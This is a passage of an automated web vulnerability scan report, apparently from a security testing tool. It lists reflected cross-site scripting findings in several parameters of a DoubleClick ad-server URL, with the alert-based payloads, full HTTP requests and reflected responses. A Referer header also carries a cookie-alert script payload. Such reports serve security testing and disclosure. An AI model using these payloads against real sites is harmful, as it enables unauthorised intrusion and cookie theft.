Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7905
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 06 Feb 2011 17:47:28 GMT
Expires: Sun, 06 Feb 2011 17:47:28 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Jan 17 10:59:03 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
nQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-5121690421337506&adurl=7a2e8'-alert(1)-'f747d321270http://www.ibm.com/innovation/de/systemx/intel?cmp=100K3&ct=100K303A&cr=Mittelstandswiki_Rotation&cm=B&csr=neiotde_mm_intel-q12011&ccy=DE&cd=2011-01-06&cn=q1_mm_off_systemxintel_fla_336x280_de&csz=336x
...[SNIP]...

4.5. http://ad-emea.doubleclick.net/adj/N1120.Mittelstandswiki/B5089496 [ai parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adj/N1120.Mittelstandswiki/B5089496

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73258'-alert(1)-'86e7173ff52 was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N1120.Mittelstandswiki/B5089496;sz=336x280;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B9MZ-29VOTYi_OZztlQfnzZ2uCtb3kP4BAAAAEAEgADgAWOag4YweYMmGo4fUo4AQggEXY2EtcHViLTUxMjE2OTA0MjEzMzc1MDayARd3d3cubWl0dGVsc3RhbmRzYmxvZy5kZboBCjMwMHgyNTBfYXPIAQnaAWZodHRwOi8vd3d3Lm1pdHRlbHN0YW5kc2Jsb2cuZGUvP2QxOGNiJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE73258'-alert(1)-'86e7173ff52&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-5121690421337506&adurl=;ord=57634238? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E02e0a7e96b=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 06 Feb 2011 17:45:11 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8043

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Jan 17 10:59:03 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
8vd3d3Lm1pdHRlbHN0YW5kc2Jsb2cuZGUvP2QxOGNiJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE73258'-alert(1)-'86e7173ff52&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-5121690421337506&adurl=http%3a%2f%2fwww.ibm.com/innovation/de/systemx/intel%3Fcmp%3D100K3%26ct%3D100K303A%26cr%3DMittelstandswiki_Rotation%26
...[SNIP]...

4.6. http://ad-emea.doubleclick.net/adj/N1120.Mittelstandswiki/B5089496 [ai parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adj/N1120.Mittelstandswiki/B5089496

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bca7e"-alert(1)-"230eda09231 was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N1120.Mittelstandswiki/B5089496;sz=336x280;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B9MZ-29VOTYi_OZztlQfnzZ2uCtb3kP4BAAAAEAEgADgAWOag4YweYMmGo4fUo4AQggEXY2EtcHViLTUxMjE2OTA0MjEzMzc1MDayARd3d3cubWl0dGVsc3RhbmRzYmxvZy5kZboBCjMwMHgyNTBfYXPIAQnaAWZodHRwOi8vd3d3Lm1pdHRlbHN0YW5kc2Jsb2cuZGUvP2QxOGNiJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAEbca7e"-alert(1)-"230eda09231&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-5121690421337506&adurl=;ord=57634238? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E02e0a7e96b=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 06 Feb 2011 17:45:04 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8043

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Jan 17 10:59:03 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
8vd3d3Lm1pdHRlbHN0YW5kc2Jsb2cuZGUvP2QxOGNiJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAEbca7e"-alert(1)-"230eda09231&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-5121690421337506&adurl=http%3a%2f%2fwww.ibm.com/innovation/de/systemx/intel%3Fcmp%3D100K3%26ct%3D100K303A%26cr%3DMittelstandswiki_Rotation%26
...[SNIP]...

4.7. http://ad-emea.doubleclick.net/adj/N1120.Mittelstandswiki/B5089496 [client parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adj/N1120.Mittelstandswiki/B5089496

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a1b4d"-alert(1)-"63ce073303c was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N1120.Mittelstandswiki/B5089496;sz=336x280;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B9MZ-29VOTYi_OZztlQfnzZ2uCtb3kP4BAAAAEAEgADgAWOag4YweYMmGo4fUo4AQggEXY2EtcHViLTUxMjE2OTA0MjEzMzc1MDayARd3d3cubWl0dGVsc3RhbmRzYmxvZy5kZboBCjMwMHgyNTBfYXPIAQnaAWZodHRwOi8vd3d3Lm1pdHRlbHN0YW5kc2Jsb2cuZGUvP2QxOGNiJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-5121690421337506a1b4d"-alert(1)-"63ce073303c&adurl=;ord=57634238? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E02e0a7e96b=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 06 Feb 2011 17:46:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8043

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Jan 17 10:59:03 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-5121690421337506a1b4d"-alert(1)-"63ce073303c&adurl=http%3a%2f%2fwww.ibm.com/innovation/de/systemx/intel%3Fcmp%3D100K3%26ct%3D100K303A%26cr%3DMittelstandswiki_Rotation%26cm%3DB%26csr%3Dneiotde_mm_intel-q12011%26ccy%3DDE%26cd%3D2011-01-06%26cn%3Dq
...[SNIP]...

4.8. http://ad-emea.doubleclick.net/adj/N1120.Mittelstandswiki/B5089496 [client parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adj/N1120.Mittelstandswiki/B5089496

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33f2c'-alert(1)-'a56d4b9fc45 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N1120.Mittelstandswiki/B5089496;sz=336x280;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B9MZ-29VOTYi_OZztlQfnzZ2uCtb3kP4BAAAAEAEgADgAWOag4YweYMmGo4fUo4AQggEXY2EtcHViLTUxMjE2OTA0MjEzMzc1MDayARd3d3cubWl0dGVsc3RhbmRzYmxvZy5kZboBCjMwMHgyNTBfYXPIAQnaAWZodHRwOi8vd3d3Lm1pdHRlbHN0YW5kc2Jsb2cuZGUvP2QxOGNiJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-512169042133750633f2c'-alert(1)-'a56d4b9fc45&adurl=;ord=57634238? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E02e0a7e96b=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 06 Feb 2011 17:46:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8043

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Jan 17 10:59:03 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-512169042133750633f2c'-alert(1)-'a56d4b9fc45&adurl=http%3a%2f%2fwww.ibm.com/innovation/de/systemx/intel%3Fcmp%3D100K3%26ct%3D100K303A%26cr%3DMittelstandswiki_Rotation%26cm%3DB%26csr%3Dneiotde_mm_intel-q12011%26ccy%3DDE%26cd%3D2011-01-06%26cn%3Dq
...[SNIP]...

4.9. http://ad-emea.doubleclick.net/adj/N1120.Mittelstandswiki/B5089496 [num parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adj/N1120.Mittelstandswiki/B5089496

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 457e7'-alert(1)-'caf99647365 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N1120.Mittelstandswiki/B5089496;sz=336x280;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B9MZ-29VOTYi_OZztlQfnzZ2uCtb3kP4BAAAAEAEgADgAWOag4YweYMmGo4fUo4AQggEXY2EtcHViLTUxMjE2OTA0MjEzMzc1MDayARd3d3cubWl0dGVsc3RhbmRzYmxvZy5kZboBCjMwMHgyNTBfYXPIAQnaAWZodHRwOi8vd3d3Lm1pdHRlbHN0YW5kc2Jsb2cuZGUvP2QxOGNiJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=0457e7'-alert(1)-'caf99647365&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-5121690421337506&adurl=;ord=57634238? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E02e0a7e96b=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 06 Feb 2011 17:45:39 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8043

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Jan 17 10:59:03 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
Lm1pdHRlbHN0YW5kc2Jsb2cuZGUvP2QxOGNiJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=0457e7'-alert(1)-'caf99647365&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-5121690421337506&adurl=http%3a%2f%2fwww.ibm.com/innovation/de/systemx/intel%3Fcmp%3D100K3%26ct%3D100K303A%26cr%3DMittelstandswiki_Rotation%26cm%3DB
...[SNIP]...

4.10. http://ad-emea.doubleclick.net/adj/N1120.Mittelstandswiki/B5089496 [num parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adj/N1120.Mittelstandswiki/B5089496

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18bf3"-alert(1)-"7264eb482c2 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N1120.Mittelstandswiki/B5089496;sz=336x280;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B9MZ-29VOTYi_OZztlQfnzZ2uCtb3kP4BAAAAEAEgADgAWOag4YweYMmGo4fUo4AQggEXY2EtcHViLTUxMjE2OTA0MjEzMzc1MDayARd3d3cubWl0dGVsc3RhbmRzYmxvZy5kZboBCjMwMHgyNTBfYXPIAQnaAWZodHRwOi8vd3d3Lm1pdHRlbHN0YW5kc2Jsb2cuZGUvP2QxOGNiJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=018bf3"-alert(1)-"7264eb482c2&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-5121690421337506&adurl=;ord=57634238? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E02e0a7e96b=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 06 Feb 2011 17:45:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8043

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Jan 17 10:59:03 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
Lm1pdHRlbHN0YW5kc2Jsb2cuZGUvP2QxOGNiJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=018bf3"-alert(1)-"7264eb482c2&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-5121690421337506&adurl=http%3a%2f%2fwww.ibm.com/innovation/de/systemx/intel%3Fcmp%3D100K3%26ct%3D100K303A%26cr%3DMittelstandswiki_Rotation%26cm%3DB
...[SNIP]...

4.11. http://ad-emea.doubleclick.net/adj/N1120.Mittelstandswiki/B5089496 [sig parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adj/N1120.Mittelstandswiki/B5089496

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1262"-alert(1)-"37bb6a46aea was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N1120.Mittelstandswiki/B5089496;sz=336x280;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B9MZ-29VOTYi_OZztlQfnzZ2uCtb3kP4BAAAAEAEgADgAWOag4YweYMmGo4fUo4AQggEXY2EtcHViLTUxMjE2OTA0MjEzMzc1MDayARd3d3cubWl0dGVsc3RhbmRzYmxvZy5kZboBCjMwMHgyNTBfYXPIAQnaAWZodHRwOi8vd3d3Lm1pdHRlbHN0YW5kc2Jsb2cuZGUvP2QxOGNiJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpwd1262"-alert(1)-"37bb6a46aea&client=ca-pub-5121690421337506&adurl=;ord=57634238? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E02e0a7e96b=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 06 Feb 2011 17:46:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8043

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Jan 17 10:59:03 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
yJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpwd1262"-alert(1)-"37bb6a46aea&client=ca-pub-5121690421337506&adurl=http%3a%2f%2fwww.ibm.com/innovation/de/systemx/intel%3Fcmp%3D100K3%26ct%3D100K303A%26cr%3DMittelstandswiki_Rotation%26cm%3DB%26csr%3Dneiotde_mm_intel-q12011%26ccy%
...[SNIP]...

4.12. http://ad-emea.doubleclick.net/adj/N1120.Mittelstandswiki/B5089496 [sig parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adj/N1120.Mittelstandswiki/B5089496

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e3514'-alert(1)-'36e03f38f43 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N1120.Mittelstandswiki/B5089496;sz=336x280;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B9MZ-29VOTYi_OZztlQfnzZ2uCtb3kP4BAAAAEAEgADgAWOag4YweYMmGo4fUo4AQggEXY2EtcHViLTUxMjE2OTA0MjEzMzc1MDayARd3d3cubWl0dGVsc3RhbmRzYmxvZy5kZboBCjMwMHgyNTBfYXPIAQnaAWZodHRwOi8vd3d3Lm1pdHRlbHN0YW5kc2Jsb2cuZGUvP2QxOGNiJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpwe3514'-alert(1)-'36e03f38f43&client=ca-pub-5121690421337506&adurl=;ord=57634238? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E02e0a7e96b=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 06 Feb 2011 17:46:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8043

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Jan 17 10:59:03 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
yJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpwe3514'-alert(1)-'36e03f38f43&client=ca-pub-5121690421337506&adurl=http%3a%2f%2fwww.ibm.com/innovation/de/systemx/intel%3Fcmp%3D100K3%26ct%3D100K303A%26cr%3DMittelstandswiki_Rotation%26cm%3DB%26csr%3Dneiotde_mm_intel-q12011%26ccy%
...[SNIP]...

4.13. http://ad-emea.doubleclick.net/adj/N1120.Mittelstandswiki/B5089496 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adj/N1120.Mittelstandswiki/B5089496

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 43731"-alert(1)-"187433e4b2d was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

